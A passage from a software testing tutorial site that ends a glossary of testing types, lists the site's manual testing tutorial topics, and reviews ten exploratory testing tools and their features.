101. Fault injection testing: Fault injection testing is a testing
technique in which a fault is intentionally introduced into the code in
order to improve the test coverage.
102. Failover testing: Failover testing is a testing technique that
validates a system’s ability to allocate extra resources during a
server failure and transfer the processing to back-up systems.
103. All pair testing: The all pair testing approach is to test the
application with all possible combinations of the values of the input
parameters.
104. Pairwise Testing: Refer All pair testing
Here I am going to conclude different types of software testing types. If
you like this post, please share it with your friends.

Here I have hand-picked a few posts which will help you to learn more
interview related stuff:

• Manual Testing Tutorial
• Agile Tutorial
• Manual Testing Interview Questions
• Agile Interview Questions
• Why You Choose Software Testing As A Career
• General Interview Questions
If you have any more questions, feel free to ask via comments. If you
find this post useful, do share it with your friends on Social
Networking.
Manual Testing Tutorial – Complete Guide | Software Testing Tutorial
In this free online Software Testing Tutorial / Manual Testing Tutorial, we
cover all manual testing concepts in detail with easy to understand
examples. This tutorial is helpful for beginners to advanced level users to
learn software testing concepts with practical examples.

Why This Manual Testing Tutorial?


This Software Testing Tutorial covers right from basics to advanced
test concepts.
What are the prerequisites to learn Manual Testing Tutorials for
beginners & advanced level?
• Basic computer knowledge
• Interest to learn Software Testing
Who is the targeted audience of this Software Testing Tutorial?
Anyone who has the interest to learn Software Testing.
Check the below playlist to watch the complete Testing Tutorial.
Manual Testing Tutorial – Table of Content
Click on the links below to see the detailed content of each concept in
this Manual Testing Tutorial.

• Software Testing
• Principles of Software Testing
• Software Development Life Cycle
• Waterfall Model in SDLC
• Spiral Model in SDLC
• V Model in SDLC
• Agile Scrum Methodology
• Software Testing Life Cycle
• Bug Life Cycle
• Types of Software Testing
• Levels of Testing
• Performance Testing Types
• Functional Testing
• Unit Testing
• Integration Testing
• End-To-End Testing
• What is Regression Testing & When Do We Do?
• What is Retesting & When Do We Do?
• Manual Testing Methods
• Test Deliverables
• Test Strategy
• Test Plan
• Test Case Template With Explanation
• Test Scenarios of Login Page
• Test Scenarios of Registration Page
• How To Write Test Cases for ATM
• Do We Really Write Test Cases For All Testing Types
• Bug Report Template
• Test Metrics
• Requirement Traceability Matrix – RTM
• Write Good Bug Report
• Software Architecture
• Black Box Test Design Techniques
• Equivalence Partitioning Testing Technique
• Boundary Value Analysis Testing Technique
• Decision Table Test Design Technique
• State Transition Test Design Technique
• Bug Severity And Priority – Info-graphic
• Defect Triage Process in Software Testing
• Performance Testing – Complete Guide
• Penetration Testing – Complete Guide
• Security Testing – Complete Guide
• Cross Browser Testing
• Cross Browser Testing Checklist
• ERP Application Testing
• Web Application Testing Tutorial
• Mobile App Testing Guide
• API Testing – Complete Guide
• Website Cookie Testing Guide
• Shift-Left Testing
• Documentation Testing
• Independent Testing
• PDCA Cycle
• Choose Software Testing As A Career
• 7 Steps To Become A Pro At QA Testing
• Software Testing Interview Questions Free eBook
• Principles of Agile Software Development
Difference Between Software Testing Types:
• SDLC Vs STLC
• Manual vs Automation Testing
• Black Box And White Box Testing
• Smoke Testing Vs Sanity Testing
• Test Strategy Vs Test Plan
• Test Case Vs Test Scenario
• Regression Vs Retesting
• Severity Vs Priority
• Functional Vs Non-Functional Testing
• Unit Testing Vs Integration Testing
• Integration Vs System Testing
• Verification And Validation
• Entry And Exit Criteria
• Performance Engineering Vs Performance Testing
• Performance Vs Load Testing
• Load Testing Vs Stress Testing
• Difference between Desktop, Client-Server And Web
Application Testing
• Difference Between Defect Bug Error And Failure
Interview Preparation Topics:
• Manual Testing Interview Questions
• Real-Time Software QA Interview Questions And Answers
• Agile Testing Interview Questions
• JIRA Interview Questions
ISTQB Certification:
ISTQB stands for International Software Testing Qualification Board. I
don’t say you will get a salary hike if you finish this certification, but it’s
always good to have a certification in career development.
• How To Prepare for ISTQB Exam
• ISTQB Quiz
Software Testing Tools:
Manual testing does not mean that the software testers won’t use any
tool in the process of testing. There are several tools available in the
market which help software QAs to test an application in an efficient
manner.
• Best Test Management Tools
• Best Defect Tracking Tools
• Best Automation Testing Tools
• Best Regression Testing Tools
• Best Cross Browser Testing Tools
• Best Unit Testing Tools
• Best Functional Testing Tools
• Best Web Application Testing Tools
• Best API Testing Tools
• Best Performance Testing Tools
• Best Penetration Testing Tools
• Best Open Source Security Testing Tools
• Best Service Virtualization Tools
Before concluding, download a sample resume and modify it as per your
needs.
Resume:
• Sample Resume for Software Testers
If you want us to cover any other topic, please comment below.
Finally, Happy Testing!

Check the below links to learn more

• Automation Testing – Selenium WebDriver.
• TestNG Tutorial
• VBScript Tutorial
• SQL Tutorial
• Java Tutorial

Best Exploratory Testing Tools in 2020
In exploratory testing, we don’t create test cases in advance; we do
test design and execution at the same time, with little or no
planning.

Check this Exploratory Testing guide for detailed understanding.


Let’s see the exploratory testing tools that facilitate organizing,
recording, and documenting during the hunt. Here we are going to list
both open source exploratory testing tools and commercial ones.

Let’s get started,
Popular Exploratory Testing Tools:


#1 Exploratory Testing Chrome Extension
It is a Chrome extension designed for web exploratory testing. It
allows you to report bugs and queries, take screenshots during the
session, save session results in a report, and import and export
sessions.

Features:
• Report bugs, ideas, notes, and questions easily
• Capture screenshots during the session
• Automatic URL tracking
• Monitor session results in a report
• Save and import session
• Export session to different file formats such as JSON, CSV or HTML
Link: Exploratory Testing Chrome Extension
#2 Bug Magnet

Bug Magnet is an exploratory testing assistant for Chrome. It allows
you to add common problematic values and edge cases to the context
menu (right-click menu) for editable elements, so you can keep them
handy and access them easily during exploratory testing sessions.

Features:
• Convenient access to common boundaries and edge cases for
exploratory testing
• Possible to extend it with our customized config files easily
• Works on input fields, text areas, and editable DIVs
Link: Bug Magnet
#3 Session Tester

Session Tester is an exploratory testing tool for managing and
recording Session-Based Testing. It has a timer feature that allows
you to limit the length of a test session, and it provides an easy way
to record session notes. It stores the notes in XML format, which is
convertible to HTML.

Link: Session Tester

#4 PractiTest

PractiTest Test Management Tool includes a new type of test that
supports Exploratory and Session-Based Testing practices. This
feature helps you to improve QA coverage and traceability.

Exploratory tests in PractiTest allow you to define charters & guide
points for your exploratory sessions and save those guidelines as test
cases for future reusability. Additionally, it allows you to document the
points that arise in the annotation section as you are running your
tests, and to report and link existing issues when running the
exploratory testing test cases. Finally, you can create reports based on
your sessions and later review them with your colleagues and your
team lead in order to gather feedback.

To get a better idea about how this works, check out PractiTest’s full
exploratory testing documentation
#5 TestPad

Testpad test management tool’s checklists make great guides for
exploratory testing. Steer testing with a high-level list of features or go
as detailed as you need. It allows you to add new tests during a
session, as you think of them.
Link: TestPad Exploratory Testing Tool
#6 QTest Explorer

qTest Explorer is an exploratory testing tool that automates the
capture of exploratory testing sessions. It frees you up from manual
screen grabs and tedious documentation.

• It allows you to test faster, capture test sessions, and report
bugs.
• It allows you to capture exploratory testing sessions and
automatically record user interactions.
• It integrates with Jira, Rally, and CA Agile Central for automatic
updates.
• qTest Explorer’s intelligent capturing engine instantly turns your
test sessions into automated Selenium or Protractor test scripts.
Link: Tricentis QTest
#7 TestRail

TestRail is a comprehensive test case management and exploratory
testing tool for your team. It allows you to store your test sessions and
allows you to add custom fields when working with test sessions.

Link: TestRail
#8 Rapid Reporter

Rapid Reporter is an SBTM (Session-Based Test Management) tool.
It manages exploratory tests by taking notes during an uninterrupted
testing session and using the notes for review afterward. No
installation is required since it is a standalone tool. It allows you to
save notes in CSV text files, which lets you combine plain-text
flexibility with spreadsheets.

It is one of the free exploratory testing tools in the market.


Link: Rapid Reporter
#9 Azure Test Plans

Azure Test Plans is an exploratory testing toolkit. It helps you to
improve your code quality using planned and exploratory testing
services for your apps.

• It allows you to design and execute tests simultaneously to
maximize quality in modern software development processes
using exploratory test sessions.
• It captures rich scenario data as you execute exploratory tests.
• You can test your application by executing tests across desktop
or web apps.
Link: Azure Test Plans
#10 Testuff

Testuff test management software helps in your exploratory testing. It
includes screen capture functionality, video recording capabilities,
the ability to add additional files and notes, and allows you to send
information directly to your favorite issue tracker.

Link: Testuff
